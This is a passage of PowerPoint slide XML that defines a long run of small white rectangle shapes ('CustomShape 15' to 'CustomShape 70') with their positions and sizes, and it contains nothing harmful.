          <p:cNvPr id="59" name="CustomShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5624640" y="1209240"/>
            <a:ext cx="366480" cy="514080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="CustomShape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4676760" y="1049040"/>
            <a:ext cx="28080" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4741920" y="1049040"/>
            <a:ext cx="28080" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="CustomShape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4797360" y="1049040"/>
            <a:ext cx="29880" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="CustomShape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4854600" y="1049040"/>
            <a:ext cx="36000" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4911840" y="1049040"/>
            <a:ext cx="36000" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="CustomShape 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4979880" y="1049040"/>
            <a:ext cx="9000" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="CustomShape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5024520" y="1049040"/>
            <a:ext cx="29880" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="CustomShape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5087880" y="1049040"/>
            <a:ext cx="28080" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="CustomShape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5143680" y="1049040"/>
            <a:ext cx="36000" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="CustomShape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5208480" y="1049040"/>
            <a:ext cx="28080" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="CustomShape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5315040" y="1049040"/>
            <a:ext cx="36000" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="CustomShape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5378400" y="1049040"/>
            <a:ext cx="28080" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="CustomShape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5433840" y="1049040"/>
            <a:ext cx="36000" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="CustomShape 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5499000" y="1049040"/>
            <a:ext cx="31320" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="CustomShape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5546880" y="1049040"/>
            <a:ext cx="33120" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="CustomShape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5600880" y="1049040"/>
            <a:ext cx="37800" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="CustomShape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5665680" y="1049040"/>
            <a:ext cx="9000" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="CustomShape 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5713560" y="1049040"/>
            <a:ext cx="25200" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="CustomShape 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5772240" y="1049040"/>
            <a:ext cx="29880" cy="90000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="CustomShape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4665600" y="1593360"/>
            <a:ext cx="39240" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="CustomShape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4713120" y="1593360"/>
            <a:ext cx="28080" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="CustomShape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4748040" y="1593360"/>
            <a:ext cx="37800" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="CustomShape 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4792680" y="1593360"/>
            <a:ext cx="33120" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="CustomShape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4832280" y="1593360"/>
            <a:ext cx="42480" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="CustomShape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4883040" y="1593360"/>
            <a:ext cx="21960" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="CustomShape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4924440" y="1593360"/>
            <a:ext cx="23400" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="CustomShape 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4956120" y="1593360"/>
            <a:ext cx="23400" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="CustomShape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4983120" y="1593360"/>
            <a:ext cx="20160" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="CustomShape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005440" y="1593360"/>
            <a:ext cx="21960" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="CustomShape 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5032440" y="1593360"/>
            <a:ext cx="4320" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="CustomShape 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5046840" y="1593360"/>
            <a:ext cx="29880" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="CustomShape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5086440" y="1593360"/>
            <a:ext cx="42480" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="CustomShape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5132520" y="1593360"/>
            <a:ext cx="21960" cy="39240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="CustomShape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5229360" y="1588680"/>
            <a:ext cx="20160" cy="21960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="CustomShape 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5202360" y="1587240"/>
            <a:ext cx="50400" cy="48960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="CustomShape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4665600" y="1426680"/>
            <a:ext cx="25200" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="CustomShape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4694400" y="1426680"/>
            <a:ext cx="21960" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="CustomShape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4719600" y="1426680"/>
            <a:ext cx="37800" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="CustomShape 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4759200" y="1426680"/>
            <a:ext cx="23400" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="CustomShape 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4786200" y="1426680"/>
            <a:ext cx="26640" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="CustomShape 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4819680" y="1426680"/>
            <a:ext cx="23400" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="CustomShape 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4851360" y="1436400"/>
            <a:ext cx="6120" cy="31320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="CustomShape 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4878360" y="1426680"/>
            <a:ext cx="21960" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="CustomShape 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4906800" y="1426680"/>
            <a:ext cx="28080" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="CustomShape 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4940280" y="1426680"/>
            <a:ext cx="21960" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="CustomShape 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4967280" y="1426680"/>
            <a:ext cx="21960" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="CustomShape 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4995720" y="1426680"/>
            <a:ext cx="21960" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="CustomShape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5024520" y="1426680"/>
            <a:ext cx="43920" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="CustomShape 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5089680" y="1426680"/>
            <a:ext cx="42480" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="CustomShape 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5140440" y="1426680"/>
            <a:ext cx="26640" cy="41040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="CustomShape 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4667400" y="1504440"/>
            <a:ext cx="47160" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="CustomShape 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4721400" y="1503000"/>
            <a:ext cx="41040" cy="42480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="CustomShape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4770360" y="1504440"/>
            <a:ext cx="34560" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="CustomShape 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4811760" y="1504440"/>
            <a:ext cx="23400" cy="37800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="CustomShape 70"/>
          <p:cNvSpPr/>
